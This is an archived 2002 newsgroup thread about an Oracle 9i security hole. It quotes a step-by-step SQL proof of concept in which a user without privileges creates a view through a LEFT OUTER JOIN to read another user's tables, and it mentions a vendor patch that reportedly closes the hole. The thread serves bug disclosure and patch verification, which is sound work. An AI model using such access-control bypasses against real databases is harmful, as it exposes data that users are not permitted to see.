Re: 9iDB Security Hole?
Vladimir M. Zakharychev wrote:
>
> one-off patch for bug 2121935 (ARU:1600347) was put out for 9.0.1.3/Solaris
> yesterday. Anyone with 9.0.1.3/Sol can install it and verify that it closes the
> hole altogether?
>
> --
> Vladimir Zakharychev (bob@dpsp-yes.com) http://www.dpsp-yes.com
> Dynamic PSP(tm) - the first true RAD toolkit for Oracle-based internet applications.
> All opinions are mine and do not necessarily go in line with those of my employer.
>
> "Vladimir M. Zakharychev" <bob_at_dpsp-yes.com> wrote in message news:a9et5g$9sa$1_at_babylon.agtel.net...
> > Anyone with 9i can confirm this?
> >
> > From: news [mailto:news_at_host.talk.ru] On Behalf Of ...
> > ...relcom.comp.dbms.oracle
> >
> >
> > connect system/****@database
> > CREATE USER us1 IDENTIFIED BY us11 DEFAULT TABLESPACE users TEMPORARY
> > TABLESPACE temp;
> > CREATE USER us2 IDENTIFIED BY us12 DEFAULT TABLESPACE users TEMPORARY
> > TABLESPACE temp;
> > Grant Create Session To us1;
> > Grant Create Session To us2;
> > Grant Create Table To us1;
> > grant unlimited tablespace to us1;
> > Grant Create View To us2;
> >
> > Connect us1/us11@database;
> > Create Table t1(c1 Number(1));
> > Insert Into t1(c1) Values(9);
> > Create Table t2(c1 Number(1));
> > Insert Into t2(c1) Values(9);
> >
> > commit;
> > Connect us2/us12@database;
> >
> > SQL> Select * From us1.t1;
> > ORA-00942: table or view does not exist
> > -- this is expected
> > SQL> Select * From us1.t2;
> > ORA-00942: table or view does not exist
> > -- this one too
> > SQL> Create View aa As Select * From us1.t1;
> > ORA-00942: table or view does not exist
> > -- and this one
> > SQL> Create View aa As Select t1.c1 As t1_c1, t2.c1 As t2_c1
> > From us1.t1 Left Outer Join us1.t2 On t1.c1 = t2.c1;
> >
> > View created
> > -- now this one is NOT !!!!!
> > SQL> select * from aa;
> >
> > T1_C1 T2_C1
> > ---- ----
> > 9 9
> >
> >
> > This effectively means that LEFT OUTER JOIN allows views to be created
> > on tables that are normally not visible (provided that the unprivileged user
> > knows the table and column names).
> > If you can confirm this basic example, can you also try it on system
> > catalog tables/views? If you can not confirm, please specify your version
> > and platform so that we know which ones are not affected (poster didn't
> > specify version, but I suggest it's 9.0.1.1 on either NT or Linux).
> >
> > --
> > Vladimir Zakharychev (bob@dpsp-yes.com) http://www.dpsp-yes.com
> > Dynamic PSP(tm) - the first true RAD toolkit for Oracle-based internet applications.
> > All opinions are mine and do not necessarily go in line with those of my employer.
> >
> >
> >
Yes - plopped onto a machine today and it works fine
Cheers
Connor
--
==============================
Connor McDonald
http://www.oracledba.co.uk
"Some days you're the pigeon, some days you're the statue..."

Received on Thu Apr 18 2002 - 15:58:22 CDT